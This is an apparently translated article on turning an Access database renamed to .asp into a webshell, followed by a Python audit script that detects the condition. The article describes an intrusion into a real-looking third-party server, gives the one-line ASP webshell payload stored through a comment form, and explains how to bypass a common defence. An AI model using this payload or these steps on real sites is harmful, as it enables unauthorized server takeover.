Disaster caused by changing MDB to ASP

Source: Internet
Author: User

Perhaps with the development of network security technology, the quality of administrators is improving: in Access + ASP systems, many now rename the MDB file to ASP or ASA to prevent the database from being downloaded. If the suffix is left unchanged, the database can be downloaded directly with tools such as quickshield. But renaming it actually opens the door for intruders, who can use a database with an ASP/ASA suffix to obtain a webshell directly.

I. Ideas

As we all know, <% %> is the delimiter for ASP code: in an ASP file, only the code between <% and %> is executed. In an Access + ASP web system, all data is stored in the database file (the MDB file). Because the administrator has renamed the MDB file to an ASP file, any submitted data containing <% %> is stored in that file, and the code between the delimiters is executed when the ASP-suffixed database is requested. As a result, we only need to submit malicious code to the database, and the database with the ASP suffix becomes our webshell.

II. Example

Pick a target at random. First, let's look at a site whose database has an ASP suffix:
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210

Return Value:

Microsoft VBScript compiler error: '800a03f6'
'End' missing'

/IISHelp/common/500-100.asp, row 242

Microsoft Jet Database Engine error '20140901'

'D:/log_mdb/%29dlog_mdb%29.asp' is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.

/Test/Conn.asp, Row 18

We submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp. It returns a bunch of garbled characters, which means we can directly download the database using tools such as Internet Express (which we will not discuss here). On the homepage, we can see that a "user comments" function is provided. We registered a user and sent a comment:

<% execute request("B") %>

In this way, the ASP code <% execute request("B") %> is written to the database, so the database is our webshell. Submit: http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp. At the end of the garbled text, we can see:

/IISHelp/common/500-100.asp, row 242
Microsoft VBScript runtime error '800a000d'

Type Mismatch: 'execute'

/Test/dlog/log_mdb/%29dlog_mdb%29.asp, row 1266

The inserted code is running.

Note: When submitting code to the database, the code content cannot be too large. Therefore, we use <% execute request("B") %>.

III. Other questions and ideas

1. If the suffix is changed to ASP and illegal ASP code such as <%='a'-1%> is added to the database to completely prevent the database from being downloaded, then, because there is illegal ASP code in it, inserting our webshell code and running it will only display the earlier error from the illegal code rather than executing our shell code. Although this can prevent certain attacks, there are still some hidden risks: we only need to add compatible error code before the error code, and the inserted webshell code is displayed correctly.

2. For MDB files whose suffix has not been changed, we can download the database, get the background password and enter the background. We can then use the database backup function to change the suffix to ASP.
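
An audit check for the condition this article describes, added here as an example and not part of the original article: it walks a web root, identifies Access databases by file header instead of suffix, and reports those that an .asp/.asa suffix would hand to the ASP engine, with a count of printable <% %> blocks stored inside. The function names and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

JET_MAGIC = (b"Standard Jet DB", b"Standard ACE DB")   # header string at byte offset 4
SCRIPT_EXTS = {".asp", ".asa"}                          # suffixes the article says admins rename to
# Printable text between ASP delimiters, e.g. a stored comment the ASP engine would execute.
ASP_BLOCK = re.compile(rb"<%[\x20-\x7e\r\n\t]{1,200}?%>")

def is_access_db(data: bytes) -> bool:
    """True if the bytes start with a Jet/ACE database header, whatever the file is named."""
    return any(data[4:4 + len(m)] == m for m in JET_MAGIC)

def audit_webroot(root):
    """Return findings for every Access database under root, judged by content, not suffix."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        data = path.read_bytes()
        if not is_access_db(data):
            continue
        if path.suffix.lower() in SCRIPT_EXTS:
            risk = "database parsed as ASP: stored <% %> data would execute"
        else:
            risk = "database reachable under web root: check it cannot be downloaded"
        findings.append({"file": path.name, "risk": risk,
                         "asp_blocks": len(ASP_BLOCK.findall(data))})
    return findings

def build_sample(root):
    """Constructed sample files: fake Jet headers plus filler, not real databases."""
    header = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    root = Path(root)
    (root / "dlog_mdb.asp").write_bytes(header + b'\x07<% execute request("B") %>\x00')
    (root / "site.mdb").write_bytes(header + b"plain rows")
    (root / "index.asp").write_bytes(b'<% Response.Write "hello" %>')  # ordinary page, ignored

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in audit_webroot(tmp):
            print(finding)
```

A nonzero asp_blocks count on a script-suffixed database means user-supplied data containing ASP delimiters is already stored in it; the block pattern is a heuristic and can also match coincidental bytes in large files.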
